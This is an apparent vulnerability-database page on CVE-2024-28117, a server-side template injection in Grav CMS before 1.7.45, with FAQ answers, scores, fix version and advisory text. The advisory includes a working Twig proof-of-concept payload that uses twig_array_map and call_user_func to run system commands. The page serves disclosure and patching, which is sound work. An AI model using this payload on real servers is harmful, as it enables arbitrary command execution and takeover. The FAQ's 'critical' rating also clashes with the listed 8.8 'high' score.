What is the severity of CVE-2024-28117?

The severity of CVE-2024-28117 is currently rated as critical due to the potential for arbitrary command execution.

How do I fix CVE-2024-28117?

To fix CVE-2024-28117, upgrade to the patched version 1.7.45 or later of the Grav software.

What are the potential impacts of CVE-2024-28117?

CVE-2024-28117 can allow attackers to execute arbitrary commands on the server, compromising the entire application.

Which versions of Grav are affected by CVE-2024-28117?

CVE-2024-28117 affects all versions of Grav prior to 1.7.45.

What function is exploited in CVE-2024-28117?

CVE-2024-28117 exploits the lack of restrictions on the twig_array_map function, allowing bypassing of validation.

Vulnerability/
CVE-2024-28117

high

8.8

CWE

EPSS

0.043%

21/3/2024

22/3/2024

3/1/2025

CVE-2024-28117: Grav vulnerable to Server Side Template Injection (SSTI)

First published: Thu Mar 21 2024(Updated: )

### Summary Grav validates accessible functions through the Utils::isDangerousFunction function, but does not impose restrictions on twig functions like twig_array_map, allowing attackers to bypass the validation and execute arbitrary commands. ### Details ``` {{ grav.twig.twig.getFunction('twig_array_map')|var_dump }} ``` ![image](https://user-images.githubusercontent.com/46442697/281397674-6098806a-e936-4849-956e-d394a7c037da.png) When we accessed twig_array_map like this, we confirmed that the twigFunction object is properly returned. Since the callable property is correctly included, we can access twig_array_map without any restrictions. ``` {% set cmd = {'id':'system'} %} {{ twig_array_map(grav.twig.twig,cmd,'call_user_func')|join }} ``` Since there is no validation on twig_array_map itself, it is possible to call arbitrary function using call_user_func. ### PoC ``` {% set cmd = {'id':'system'} %} {{ twig_array_map(grav.twig.twig,cmd,'call_user_func')|join }} ``` ### Impact Twig processing of static pages can be enabled in the front matter by any administrative user allowed to create or edit pages. As the Twig processor runs unsandboxed, this behavior can be used to gain arbitrary code execution and elevate privileges on the instance.

Credit: security-advisories@github.com security-advisories@github.com

Affected Software	Affected Version	How to fix
composer/getgrav/grav	<1.7.45	1.7.45
Getgrav	<1.7.45

Remedy

https://github.com/getgrav/grav/commit/de1ccfa12dbcbf526104d68c1a6bc202a98698fe

Never miss a vulnerability like this again

Reference Links

Frequently Asked Questions

What is the severity of CVE-2024-28117?
The severity of CVE-2024-28117 is currently rated as critical due to the potential for arbitrary command execution.
How do I fix CVE-2024-28117?
To fix CVE-2024-28117, upgrade to the patched version 1.7.45 or later of the Grav software.
What are the potential impacts of CVE-2024-28117?
CVE-2024-28117 can allow attackers to execute arbitrary commands on the server, compromising the entire application.
Which versions of Grav are affected by CVE-2024-28117?
CVE-2024-28117 affects all versions of Grav prior to 1.7.45.
What function is exploited in CVE-2024-28117?
CVE-2024-28117 exploits the lack of restrictions on the twig_array_map function, allowing bypassing of validation.

agent/weakness
agent/title
agent/type
agent/first-publish-date
agent/references
agent/description
agent/event
agent/author
collector/epss-latest
source/FIRST
agent/epss
collector/mitre-cve
source/MITRE
agent/trending
agent/remedy
agent/softwarecombine
collector/github-advisory-latest
source/GitHub
alias/GHSA-qfv4-q44r-g7rv
alias/CVE-2024-28117
agent/software-canonical-lookup
agent/last-modified-date
collector/github-advisory
agent/severity
agent/source
agent/tags
collector/nvd-api
source/NVD
agent/software-canonical-lookup-request
collector/nvd-cve
package-manager/composer
vendor/getgrav
canonical/getgrav